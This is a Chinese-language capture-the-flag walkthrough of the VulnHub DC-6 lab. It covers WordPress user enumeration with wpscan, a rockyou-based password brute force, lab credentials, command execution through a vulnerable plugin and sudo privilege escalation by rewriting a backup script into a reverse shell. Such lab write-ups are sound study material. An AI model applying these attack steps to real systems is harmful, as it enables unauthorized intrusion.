vulnhub-DC-6

nmap扫描开了22、80端口

修改/etc/hosts文件，把wordy对应靶机ip 192.168.57.151

wpscan --url http://wordy -e u

+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


sudo wpscan --url http://wordy -e u -U ../name.txt -P /usr/share/wordlists/rockyou.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Username: mark, Password: helpdesk01

进后台，这个账号不是管理员。翻了翻看到个active monitor。应该是什么插件

网上搜了搜，马上找到个：https://www.it2021.com/penetration/543.html

尝试了下可以执行命令

弹shell试试

拿到shell后

python -c 'import pty;pty.spawn("/bin/bash")'

在/home/mark/stuff/下有个things-to-do.txt

cat看看

似乎有个新加用户,su一下成功了

graham GSo7isUM1D4

sudo -l，似乎有个备份脚本可以用，执行看看

执行显示

/home/jens/backups.sh
tar: Removing leading `/' from member names
tar (child): backups.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: backups.tar.gz: Wrote only 4096 of 10240 bytes
tar: Child returned status 2
tar: Error is not recoverable: exiting now

想了一会不知道怎么弄，看别人是直接修改backups.sh

graham可以以jens的身份执行backups.sh，所以改成弹shell的，弹个jens用户的shell